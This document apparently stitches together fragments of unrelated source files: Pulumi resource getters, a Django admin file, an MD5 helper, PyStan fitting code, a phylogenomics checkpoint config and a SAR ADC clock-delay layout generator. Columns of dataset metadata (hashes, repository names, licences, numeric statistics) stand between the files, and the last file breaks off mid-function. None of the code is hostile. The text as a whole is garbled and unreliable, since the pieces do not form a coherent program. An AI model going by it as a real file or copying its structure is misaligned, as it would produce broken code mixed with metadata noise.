def package_details(self) -> pulumi.Output['outputs.PublicationPackageDetails']:
"""
A base object for the properties of the package
"""
return pulumi.get(self, "package_details")
@property
@pulumi.getter(name="packageType")
def package_type(self) -> pulumi.Output[str]:
"""
Type of the artifact of the listing
"""
return pulumi.get(self, "package_type")
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> pulumi.Output[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The state of the listing in its lifecycle
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> pulumi.Output[Sequence['outputs.PublicationSupportContact']]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@property
@pulumi.getter(name="supportedOperatingSystems")
def supported_operating_systems(self) -> pulumi.Output[Sequence['outputs.PublicationSupportedOperatingSystem']]:
"""
List of operating systems supprted.
"""
return pulumi.get(self, "supported_operating_systems")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
| 52.339877
| 369
| 0.678857
| 4,796
| 42,657
| 5.828399
| 0.059008
| 0.072014
| 0.062534
| 0.037778
| 0.912746
| 0.891532
| 0.868279
| 0.843988
| 0.830787
| 0.803384
| 0
| 0.00357
| 0.218651
| 42,657
| 814
| 370
| 52.404177
| 0.835104
| 0.399301
| 0
| 0.652273
| 1
| 0
| 0.150318
| 0.058916
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163636
| false
| 0.002273
| 0.015909
| 0
| 0.279545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ec100d59f8371937781ae3ee5ca759179729bdc
| 132
|
py
|
Python
|
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | null | null | null |
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | null | null | null |
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | 1
|
2019-12-11T09:49:46.000Z
|
2019-12-11T09:49:46.000Z
|
from django.contrib import admin
from django.contrib import admin
from pokemon.models import Pokemon
admin.site.register(Pokemon)
| 18.857143
| 34
| 0.833333
| 19
| 132
| 5.789474
| 0.473684
| 0.181818
| 0.309091
| 0.418182
| 0.545455
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113636
| 132
| 6
| 35
| 22
| 0.940171
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d903b2ad7cce75d115243551b660f19ca770ca55
| 172
|
py
|
Python
|
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | 1
|
2022-03-10T02:54:30.000Z
|
2022-03-10T02:54:30.000Z
|
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | null | null | null |
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.8
# -*- coding: utf-8 -*-
# @Author : youshu.Ji
from .baseio.OTHER import *
from .baseio.FILEIO import *
from .baseio.DIR import *
from .baseml import *
| 24.571429
| 28
| 0.674419
| 25
| 172
| 4.64
| 0.64
| 0.258621
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020548
| 0.151163
| 172
| 7
| 29
| 24.571429
| 0.773973
| 0.360465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d916b106bb189cbc9df19e98e69a1bf08f5cea18
| 95
|
py
|
Python
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 5
|
2020-04-24T07:01:46.000Z
|
2021-06-27T17:59:58.000Z
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 1
|
2021-01-05T02:45:01.000Z
|
2021-01-05T02:45:01.000Z
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 3
|
2020-07-21T05:09:02.000Z
|
2021-10-20T06:46:14.000Z
|
import hashlib
def get_md5_digest(source_data):
return hashlib.md5(source_data).digest()
| 15.833333
| 44
| 0.778947
| 14
| 95
| 5
| 0.642857
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.126316
| 95
| 5
| 45
| 19
| 0.819277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
7978a4b4e371a0a844fe4b73bb2960927478d2f8
| 6,472
|
py
|
Python
|
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
fit_and_load_stan_model.py
|
JanMuench/Tutorial_Bayesian_Filter_cPCF_data
|
48a4b31eca62d0ab3a941bc34e431a2772f04dbf
|
[
"MIT"
] | null | null | null |
import os
import pickle
import numpy as np
def load(filename):
"""Reload compiled models for reuse."""
print("Trying to load pickle in:")
print(os.getcwd())
return pickle.load(open(filename,'rb'))
def create_model_and_fit(DATA, name, sampling_iter, warmingUp, chains):
print("get model and fit:"+os.getcwd())
try:
model = load(name)
except:
model = load("RE_approach.pic")
print("sampling_iter", sampling_iter)
print("sampling in: " + os.getcwd())
print("warmup"+str(warmingUp))
print("chains"+str(chains))
#try:
# inv_metric = np.load("inv_metric_sampler.npy")
# control = {"inv_metric": inv_metric,
# "adapt_engaged": True
# }
# fit = model.sampling(DATA,
# n_jobs = -1,
# chains=chains,
# thin=1,
# warmup=warmingUp,#4000,
# iter=int(sampling_iter),
# verbose=True,
# control = control,
# refresh = 100,
# test_grad = None)
#except:
fit = model.sampling(DATA,
n_jobs = -1,
chains=chains,
thin=2,
warmup=warmingUp,#4000,
iter=int(sampling_iter),
verbose=True,
refresh = 100,
test_grad = None)
print("finished sampling")
try:
fit.summary()
except:
print("could not create fit summary")
return fit, model
def fit_patch_fluo(DATA, name, sampling_iter, chains, warmup, seed, invMetric, stepsize, trained):
print("sampling_iter", sampling_iter)
print("sampling in: " + os.getcwd())
print("warmup"+str(warmup))
print("chains"+str(chains))
print("get model and fit:"+os.getcwd())
print(name)
if trained == True:
control = {"stepsize": stepsize,
"inv_metric": invMetric,
"adapt_engaged": True}
try:
model = load(name)
except:
model = load("RE_fluores.pic")
print("Hallooooo")
fit = model.sampling(DATA,
n_jobs=-1,
chains=chains,
thin=2,
warmup=warmup, # 4000,
iter=sampling_iter,
verbose=True,
refresh=8,
test_grad=None,
seed = seed,
control = control)
else:
try:
model = load(name)
except:
model = load("RE_fluores.pic")
print("Hallooooo")
fit = model.sampling(DATA,
n_jobs=-1,
chains=chains,
thin=2,
warmup=warmup, # 4000,
iter=sampling_iter,
verbose=True,
refresh=8,
test_grad=None,
seed=seed)
#init_list = {"rates": [100,500,10,100,2543],
# "ratios":[0.5,0.5,0.5,0.5,0.0005],
# "N_ion_trace":[1000,1000,1000,1000,1000],
# "OpenVar": 0.01,
# "lambda_fluoresc" : 0.75,
# }
#fit = model.optimizing(DATA,
# iter = 1000,
# init = init_list,
# verbose= True,
# as_vector =False )
print(fit)
print("finished sampling")
try:
fit.summary()
except:
print("could not create fit summary")
return fit, model
def PredicPriorDistri(DATA, name, sampling_iter, chains, warmup, seed, invMetric, stepsize, trained, algo):
print("sampling_iter", sampling_iter)
print("sampling in: " + os.getcwd())
print("warmup"+str(warmup))
print("chains"+str(chains))
print("get model and fit:"+os.getcwd())
print(name)
if trained == True:
control = {"stepsize": stepsize,
"inv_metric": invMetric,
"adapt_engaged": True}
try:
model = load(name)
except:
model = load("RE_fluores.pic")
print("Hallooooo")
fit = model.sampling(DATA,
n_jobs=-1,
chains=chains,
thin=1,
warmup=warmup, # 4000,
iter=sampling_iter,
verbose=True,
refresh=8,
test_grad=None,
seed = seed,
control = control,
algorithm=algo)
else:
try:
model = load(name)
except:
model = load("RE_fluores.pic")
print("Hallooooo")
fit = model.sampling(DATA,
n_jobs=-1,
chains=chains,
thin=1,
warmup=warmup, # 4000,
iter=sampling_iter,
verbose=True,
refresh=8,
test_grad=None,
seed=seed,
algorithm=algo)
#init_list = {"rates": [100,500,10,100,2543],
# "ratios":[0.5,0.5,0.5,0.5,0.0005],
# "N_ion_trace":[1000,1000,1000,1000,1000],
# "OpenVar": 0.01,
# "lambda_fluoresc" : 0.75,
# }
#fit = model.optimizing(DATA,
# iter = 1000,
# init = init_list,
# verbose= True,
# as_vector =False )
print(fit)
print("finished sampling")
try:
fit.summary()
except:
print("could not create fit summary")
return fit, model
| 31.2657
| 107
| 0.410383
| 562
| 6,472
| 4.620996
| 0.177936
| 0.069311
| 0.009241
| 0.046207
| 0.849057
| 0.832114
| 0.832114
| 0.832114
| 0.8067
| 0.773585
| 0
| 0.04881
| 0.487176
| 6,472
| 207
| 108
| 31.2657
| 0.733655
| 0.213226
| 0
| 0.858209
| 0
| 0
| 0.098929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.022388
| 0
| 0.08209
| 0.231343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79c6281b4be7663b29506ef9edf4dfc0c9058098
| 3,172
|
py
|
Python
|
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
bin/phylociraptor_modules/outfiles.py
|
reslp/smsi-phylogenomics
|
b488b18d695c3f61270e2b0c1dc5242893dbcc39
|
[
"MIT"
] | null | null | null |
outfile_dict = {
"setup": ["results/checkpoints/modes/phylogenomics_setup.done"],
"orthology": ["results/checkpoints/modes/phylogenomics_setup.done"],
"filter-orthology": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done"],
"align": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done"],
"filter-align": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done", "results/checkpoints/modes/align.done"],
"speciestree": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done", "results/checkpoints/modes/align.done", "results/checkpoints/modes/filter_align.done"],
"njtree": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done", "results/checkpoints/modes/align.done", "results/checkpoints/modes/filter_align.done"],
"mltree": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done", "results/checkpoints/modes/align.done", "results/checkpoints/modes/filter_align.done"],
"modeltest": ["results/checkpoints/modes/phylogenomics_setup.done", "results/checkpoints/modes/orthology.done", "results/checkpoints/modes/filter_orthology.done", "results/checkpoints/modes/align.done", "results/checkpoints/modes/filter_align.done"],
"report": ["results/checkpoints/modes/phylogenomics_setup.done"]
}
steps_to_check = ["setup", "orthology", "filter-orthology", "align", "filter-align", "njtree", "modeltest", "mltree", "speciestree"]
checkpoint_file_dict = {
"setup": "results/checkpoints/modes/phylogenomics_setup.done",
"orthology": "results/checkpoints/modes/orthology.done",
"filter-orthology": "results/checkpoints/modes/filter_orthology.done",
"align": "results/checkpoints/modes/align.done",
"filter-align": "results/checkpoints/modes/filter_align.done",
"speciestree": "results/checkpoints/modes/speciestree.done",
"njtree": "results/checkpoints/modes/njtree.done",
"mltree": "results/checkpoints/modes/trees.done",
"modeltest": "results/checkpoints/modes/modeltest.done"
}
outdir_dict = {
"setup": ["results/orthology/busco/busco_set", "results/assemblies", "results/downloaded_genomes"],
"orthology": ["results/orthology/busco"],
"align": ["results/alignments"],
"filter-orthology": ["results"],
"align": ["results"],
"filter-align": ["results/alignments/trimmed", "results/alignments/filtered"],
"speciestree": [""], #donefile will have to do as check, because there are several possible output folder combinations for this step
"njtree": [""], #donefile will have to do as check, because there are several possible output folder combinations for this step
"mltree": [""], #donefile will have to do as check, because there are several possible output folder combinations for this step
"modeltest": ["results/modeltest"]
}
| 77.365854
| 253
| 0.776166
| 363
| 3,172
| 6.69697
| 0.129477
| 0.303579
| 0.387906
| 0.244344
| 0.823118
| 0.766763
| 0.666392
| 0.65364
| 0.65364
| 0.65364
| 0
| 0
| 0.061475
| 3,172
| 40
| 254
| 79.3
| 0.816594
| 0.104035
| 0
| 0
| 0
| 0
| 0.815363
| 0.676533
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30ebfa19b9a014242bb664eaef7efbe49c42d1f0
| 141
|
py
|
Python
|
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
pymiele/__init__.py
|
astrandb/pymiele
|
61d4d52ac6f191b3b64c57600072bc8f8179cdad
|
[
"MIT"
] | null | null | null |
"""Library for Miele integration with Home Assistant."""
from .const import * # noqa: F401, F403
from .pymiele import * # noqa: F401, F403
| 35.25
| 56
| 0.702128
| 19
| 141
| 5.210526
| 0.736842
| 0.20202
| 0.282828
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.177305
| 141
| 3
| 57
| 47
| 0.75
| 0.602837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eb5f8dae7c094d63207329ab632cb03ce521a83b
| 153
|
py
|
Python
|
src/amuse/support/data/console.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/support/data/console.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/support/data/console.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
import warnings
from amuse.support.console import *
warnings.warn("amuse.support.data.console has moved to amuse.support.console", DeprecationWarning)
| 25.5
| 98
| 0.816993
| 20
| 153
| 6.25
| 0.6
| 0.288
| 0.304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091503
| 153
| 5
| 99
| 30.6
| 0.899281
| 0
| 0
| 0
| 0
| 0
| 0.398693
| 0.30719
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
eb6a2330566ec8c37a13e9ac2ed57f1d99ac9e0e
| 54,164
|
py
|
Python
|
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | null | null | null |
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | null | null | null |
generators/adc_sar_sarclkdelay_layout_generator.py
|
xyabc/laygo_obsolete
|
86d795fd8e9c95b54dc80309a31bb1ad89e5c261
|
[
"BSD-2-Clause"
] | 1
|
2019-06-27T12:53:34.000Z
|
2019-06-27T12:53:34.000Z
|
#!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""ADC library
"""
import laygo
import numpy as np
#from logic_layout_generator import *
from math import log
import yaml
import os
#import logging;logging.basicConfig(level=logging.DEBUG)
def create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):
"""create power pin"""
rvdd0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VDD', gridname, sort=True)
rvdd1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VDD', gridname, sort=True)
rvss0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VSS', gridname, sort=True)
rvss1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VSS', gridname, sort=True)
laygen.pin(name='VDD', layer=layer, xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=gridname)
laygen.pin(name='VSS', layer=layer, xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=gridname)
def generate_sarclkdelayslice(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
m=2, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
inv_name = 'inv_' + str(m) + 'x'
nand_name = 'nand_' + str(m) + 'x'
mux_name = 'mux2to1_' + str(m) + 'x'
# placement
isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
gridname=pg, xy=origin, template_libname=templib_logic)
inand0 = laygen.relplace(name="I" + objectname_pfix + 'ND0', templatename=nand_name,
gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
iinv00 = laygen.relplace(name="I" + objectname_pfix + 'INV00', templatename=inv_name,
gridname=pg, refinstname=inand0.name, template_libname=templib_logic)
inand1 = laygen.relplace(name="I" + objectname_pfix + 'ND1', templatename=nand_name,
gridname=pg, refinstname=iinv00.name, template_libname=templib_logic)
iinv10 = laygen.relplace(name="I" + objectname_pfix + 'INV10', templatename=inv_name,
gridname=pg, refinstname=inand1.name, template_libname=templib_logic)
iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
gridname=pg, refinstname=iinv10.name, template_libname=templib_logic)
iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
y0 = pdict[isel0.name]['I'][0][1] + 0
#route-sel
[rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
pdict[inand1.name]['B'][0], y0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
pdict[inand0.name]['B'][0], y0+1, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
#route-input
rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand0.name]['A'][0],
np.array([x0, y0+2]), rg_m3m4)
rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand1.name]['A'][0],
np.array([x0, y0+2]), rg_m3m4)
#route-path0
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand0.name]['O'][0],
pdict[iinv00.name]['I'][0], y0+3, rg_m3m4, extendl=2, extendr=2)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv00.name]['O'][0],
pdict[imux0.name]['I0'][0], y0+4, rg_m3m4)
#route-path1
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[inand1.name]['O'][0],
pdict[iinv10.name]['I'][0], y0+3, rg_m3m4, extendl=2, extendr=2)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv10.name]['O'][0],
pdict[iinv11.name]['I'][0], y0+2, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
#route-output
rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
np.array([x1, y0+2]), rg_m3m4)
#pins
laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rout0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='right')
# power pin
create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelayslice_compact(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
m=2, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
inv_name = 'inv_' + str(m) + 'x'
mux_name = 'mux2to1_' + str(m) + 'x'
# placement
isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
gridname=pg, xy=origin, template_libname=templib_logic)
iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
y0 = pdict[isel0.name]['I'][0][1] + 0
#route-sel
[rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
#route-input
#rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['I0'][0],
# np.array([x0, y0+2]), rg_m3m4)
#rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
# np.array([x0, y0+2]), rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
pdict[imux0.name]['I0'][0], y0+2, rg_m3m4)
#route-path1
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
#route-output
rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
np.array([x1, y0+2]), rg_m3m4)
#pins
